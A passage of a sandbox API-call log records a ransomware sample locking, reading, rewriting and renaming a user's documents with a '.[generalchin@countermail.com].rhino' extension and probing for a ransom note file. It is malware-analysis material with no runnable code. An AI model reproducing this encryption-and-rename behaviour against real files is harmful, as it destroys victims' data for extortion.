hHeap=0x6d0000) returned 1 [0106.042] WriteFile (in: hFile=0x224, lpBuffer=0x23c0b60*, nNumberOfBytesToWrite=0xbd0b, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23c0b60*, lpNumberOfBytesWritten=0x292f304*=0xbd0b, lpOverlapped=0x0) returned 1 [0106.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b58 | out: hHeap=0x6d0000) returned 1 [0106.043] UnlockFile (hFile=0x224, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xbd0b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.043] CloseHandle (hObject=0x224) returned 1 [0106.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x79fdc8 [0106.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75bd20 [0106.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79fdc8 | out: hHeap=0x6d0000) returned 1 [0106.045] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cG9Y_mfr-.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg9y_mfr-.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cG9Y_mfr-.docx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg9y_mfr-.docx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd20 | out: hHeap=0x6d0000) returned 1 [0106.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bb98 | out: hHeap=0x6d0000) returned 1 [0106.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a658 | out: hHeap=0x6d0000) returned 1 [0106.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77d400 [0106.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d038 | out: hHeap=0x6d0000) returned 1 [0106.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77d038 [0106.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x7a7648 [0106.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d038 | out: hHeap=0x6d0000) returned 1 [0106.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9b50 [0106.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a7648 | out: hHeap=0x6d0000) returned 1 [0106.049] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.050] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9b50 | out: hHeap=0x6d0000) returned 1 [0106.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f41TDB3cCDdGN.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f41tdb3ccddgn.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0106.050] GetFileSize (in: hFile=0x224, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x15dbf [0106.050] LockFile (hFile=0x224, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15edf, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.050] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.050] ReadFile (in: hFile=0x224, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.146] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.146] ReadFile (in: hFile=0x224, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x15dbf, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x15dbf, lpOverlapped=0x0) returned 1 [0106.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba08 [0106.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba08 | out: hHeap=0x6d0000) returned 1 [0106.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x7a2830 [0106.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7ee8 [0106.147] GetLastError () returned 0x0 [0106.147] SetLastError (dwErrCode=0x0) [0106.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a2830 | out: hHeap=0x6d0000) returned 1 [0106.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x15de2) returned 0x23b0048 [0106.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ee8 | out: hHeap=0x6d0000) returned 1 [0106.152] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0106.152] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x71b1c8 [0106.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0106.153] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72ba08 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72ba18 [0106.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba08 | out: hHeap=0x6d0000) returned 1 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72ba08 [0106.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba18 | out: hHeap=0x6d0000) returned 1 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba18 [0106.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba08 | out: hHeap=0x6d0000) returned 1 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72ba08 [0106.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba18 | out: hHeap=0x6d0000) returned 1 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x7544f0 [0106.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba08 | out: hHeap=0x6d0000) returned 1 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x71b368 [0106.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7544f0 | out: hHeap=0x6d0000) returned 1 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7abe68 [0106.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b368 | out: hHeap=0x6d0000) returned 1 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7573b0 [0106.153] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7abe68 | out: hHeap=0x6d0000) returned 1 [0106.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x7a2830 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7573b0 | out: hHeap=0x6d0000) returned 1 [0106.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7ee8 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a2830 | out: hHeap=0x6d0000) returned 1 [0106.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef4a0 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ee8 | out: hHeap=0x6d0000) returned 1 [0106.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75a2c0 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef4a0 | out: hHeap=0x6d0000) returned 1 [0106.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x71a7f8 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75a2c0 | out: hHeap=0x6d0000) returned 1 [0106.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x71b750 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a7f8 | out: hHeap=0x6d0000) returned 1 [0106.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x71b898 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b750 | out: hHeap=0x6d0000) returned 1 [0106.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x71ba80 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b898 | out: hHeap=0x6d0000) returned 1 [0106.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x71bd50 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ba80 | out: hHeap=0x6d0000) returned 1 [0106.154] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x71c188 [0106.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bd50 | out: hHeap=0x6d0000) returned 1 [0106.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x71b750 [0106.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c188 | out: hHeap=0x6d0000) returned 1 [0106.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x71c0b8 [0106.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b750 | out: hHeap=0x6d0000) returned 1 [0106.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x71ced0 [0106.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c0b8 | out: hHeap=0x6d0000) returned 1 [0106.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x71e410 [0106.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ced0 | out: hHeap=0x6d0000) returned 1 [0106.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7203d8 [0106.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71e410 | out: hHeap=0x6d0000) returned 1 [0106.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x71b750 [0106.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7203d8 | out: hHeap=0x6d0000) returned 1 [0106.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x71fea0 [0106.155] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b750 | out: hHeap=0x6d0000) returned 1 [0106.155] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x23c5e38 [0106.156] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71fea0 | out: hHeap=0x6d0000) returned 1 [0106.156] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x23cfe68 [0106.157] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c5e38 | out: hHeap=0x6d0000) returned 1 [0106.158] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x23deea0 [0106.159] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23cfe68 | out: hHeap=0x6d0000) returned 1 [0106.160] WriteFile (in: hFile=0x224, lpBuffer=0x23deec0*, nNumberOfBytesToWrite=0x15edf, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x23deec0*, lpNumberOfBytesWritten=0x292f304*=0x15edf, lpOverlapped=0x0) returned 1 [0106.161] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23deea0 | out: hHeap=0x6d0000) returned 1 [0106.161] UnlockFile (hFile=0x224, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15edf, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.161] CloseHandle (hObject=0x224) returned 1 [0106.163] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0690 [0106.163] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75a2c0 [0106.163] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0690 | out: hHeap=0x6d0000) returned 1 [0106.163] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f41TDB3cCDdGN.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f41tdb3ccddgn.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f41TDB3cCDdGN.docx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f41tdb3ccddgn.docx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.168] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75a2c0 | out: hHeap=0x6d0000) returned 1 [0106.168] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b1c8 | out: hHeap=0x6d0000) returned 1 [0106.169] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0106.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x7aaed0 [0106.170] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d400 | out: hHeap=0x6d0000) returned 1 [0106.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77d400 [0106.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x7a7c48 [0106.170] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d400 | out: hHeap=0x6d0000) returned 1 [0106.170] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9c08 [0106.170] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a7c48 | out: hHeap=0x6d0000) returned 1 [0106.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0106.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9c08 | out: hHeap=0x6d0000) returned 1 [0106.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FFPbqnA-hPuQPBrPE4c.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ffpbqna-hpuqpbrpe4c.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0106.175] GetFileSize (in: hFile=0x224, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x10eef [0106.175] LockFile (hFile=0x224, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1100f, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.175] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.175] ReadFile (in: hFile=0x224, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.177] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.177] ReadFile (in: hFile=0x224, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x10eef, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x10eef, lpOverlapped=0x0) returned 1 [0106.178] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba08 [0106.178] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba08 | out: hHeap=0x6d0000) returned 1 [0106.178] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x7a2830 [0106.178] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7ee8 [0106.179] GetLastError () returned 0x0 [0106.179] SetLastError (dwErrCode=0x0) [0106.179] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7a2830 | out: hHeap=0x6d0000) returned 1 [0106.179] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10f12) returned 0x23b0048 [0106.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ee8 | out: hHeap=0x6d0000) returned 1 [0106.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0106.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x71b1c8 [0106.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0106.182] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72ba08 [0106.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72ba18 [0106.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba08 | out: hHeap=0x6d0000) returned 1 [0106.183] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72ba08 [0106.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba18 | out: hHeap=0x6d0000) returned 1 [0106.183] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba18 [0106.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba08 | out: hHeap=0x6d0000) returned 1 [0106.183] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72ba08 [0106.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba18 | out: hHeap=0x6d0000) returned 1 [0106.183] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x7544f0 [0106.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72ba08 | out: hHeap=0x6d0000) returned 1 [0106.183] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x71b368 [0106.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7544f0 | out: hHeap=0x6d0000) returned 1 [0106.183] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7abe68 [0106.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b368 | out: hHeap=0x6d0000) returned 1 [0106.183] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7573b0 [0106.190] UnlockFile (hFile=0x224, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1100f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.190] CloseHandle (hObject=0x224) returned 1 [0106.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0690 [0106.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0106.309] LockFile (hFile=0x274, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7518, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.310] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.310] ReadFile (in: hFile=0x274, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.311] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.312] ReadFile (in: hFile=0x274, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x73f8, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x73f8, lpOverlapped=0x0) returned 1 [0106.312] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba78 [0106.313] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.314] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72ba78 [0106.314] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72ba88 [0106.316] UnlockFile (hFile=0x274, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7518, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.317] CloseHandle (hObject=0x274) returned 1 [0106.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0690 [0106.317] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0106.320] LockFile (hFile=0x274, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13bca, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.320] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.320] ReadFile (in: hFile=0x274, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.322] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.322] ReadFile (in: hFile=0x274, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x13aaa, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x13aaa, lpOverlapped=0x0) returned 1 [0106.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba78 [0106.326] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72ba78 [0106.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72ba88 [0106.328] UnlockFile (hFile=0x274, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13bca, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.328] CloseHandle (hObject=0x274) returned 1 [0106.329] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0690 [0106.329] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75a2c0 [0106.334] LockFile (hFile=0x274, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17fe9, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.334] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.334] ReadFile (in: hFile=0x274, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.335] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.336] ReadFile (in: hFile=0x274, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x17ec9, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x17ec9, lpOverlapped=0x0) returned 1 [0106.338] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72ba78 [0106.340] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72ba78 [0106.340] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72ba88 [0106.346] UnlockFile (hFile=0x274, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17fe9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0106.346] CloseHandle (hObject=0x274) returned 1 [0106.347] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0690 [0106.347] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75a2c0 [0106.474] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x165e5, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.474] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.474] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.476] 